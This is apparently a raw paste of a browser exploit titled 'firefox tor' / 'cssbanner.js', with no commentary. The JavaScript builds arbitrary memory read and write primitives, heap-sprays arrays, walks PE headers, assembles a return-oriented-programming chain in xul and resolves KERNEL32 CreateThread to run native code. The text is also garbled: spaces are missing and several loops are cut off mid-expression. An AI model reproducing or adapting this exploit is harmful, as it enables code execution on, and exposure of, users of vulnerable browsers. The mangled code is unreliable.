firefox tor

cssbanner.js：
self.onmessage =

function(msg) {

thecode = msg.data;

var pack = function(b) { var a = b >> 16; return String.fromCharCode(b

& 65535) + String.fromCharCode(a) };

function Memory(b,a,f)

{

this._base_addr=b;

this._read=a;

this._write=f;

this._abs_read =function(a) {

a >=this._base_addr ? a = this._read( a - this._base_addr) : (

a = 4294967295 - this._base_addr + 1 + a, a = this._read(a));

return0>a?4294967295+a+1:a

};

this._abs_write= function(a,b) {

a >=this._base_addr ? this._write(a - this._base_addr, b) : ( a

= 4294967295 - this._base_addr + 1 + a, this._write(a,b) )

};

this.readByte =function(a) {

returnthis.read(a) & 255

};

this.readWord =function(a) {

returnthis.read(a) & 65535

};

this.readDword =function(a){ return this.read(a) };

this.read =function(a,b) {

if (a%4) {

var c =this._abs_read( a & 4294967292),

d =this._abs_read( a+4 & 4294967292),

e =a%4;

returnc>>>8*e | d<<8*(4-e) } returnthis._abs_read(a) }; this.readStr =function(a) { for(var b ="", c = 0;;) { if (32== c) return ""; var d =this.readByte(a+c); if(0 ==d) break; b +=String.fromCharCode(d); c++ } return b }; this.write =function(a){} } function PE(b,a) { this.mem = b; this.export_table = this.module_base = void 0; this.export_table_size = 0; this.import_table = void 0; this.import_table_size = 0; this.find_module_base = function(a) { for(a &=4294901760; a; ) { if(23117== this.mem.readWord(a)) return this.module_base=a; a -= 65536 } }; this._resolve_pe_structures = function() { peFile =this.module_base + this.mem.readWord(this.module_base+60); if(17744 !=this.mem.readDword(peFile)) throw"Bad NT Signature"; this.pe_file= peFile; this.optional_header = this.pe_file+36; this.export_directory = this.module_base+this.mem.readDword(this.pe_file+120); this.export_directory_size = this.mem.readDword(this.pe_file+124); this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128); this.import_directory_size=this.mem.readDword(this.pe_file+132)}; this.resolve_imported_function=function(a,b){ void0==this.import_directory&&this._resolve_pe_structures(); for(var e=this.import_directory,c=e+this.import_directory_size;e>2)+i] = d;

d=(b+4>>2)+e;

c[d++]=g;

c[d++]=a+(b+4*e+28);

c[d++]=a;

c[d++]=4096;

c[d++]=4096;

c[d++]=64;

c[d++]=3435973836;

return c

}

}

var conv=newArrayBuffer(8),

convf64=newFloat64Array(conv),

convu32=newUint32Array(conv),

qword2Double=function(b,a){

convu32[0]=b;

convu32[1]=a;

returnconvf64[0]

},

doubleFromFloat= function(b,a) {

convf64[0]=b;

returnconvu32[a]

},

sprayArrays=function() {

for(varb=Array(262138),a=0;262138>a;a++)

b[a]=fzero;

for(a=0;aj;j++)

spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);

spr[i][offset+(o3+8)/8]=qword2Double(0,0);

spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);

spr[i][offset+(o7+168)/8]=qword2Double(0,3);

spr[i][offset+(o7+88)/8]=qword2Double(0,2);

break

}

for(;memory.length==len;);

var mem=newMemory(memarrayloc+48,

function(b){return memory[b/4]},

function(b,a){memory[b/4]=a}),

xulPtr=mem.readDword(memarrayloc+12);

spr[arr_index][arr_offset+1]=ropArrBuf;

ropPtr=mem.readDword(arrBase+8);

spr[arr_index][arr_offset+1]=null;

ropBase=mem.readDword(ropPtr+16);

var rop=newROP(mem,xulPtr);

rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);

varbackupESP=rop.findSequence([137,1,195]), ropChain=new

Uint32Array(ropArrBuf);

ropChain[0]=backupESP;

CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");

for(vari=0;i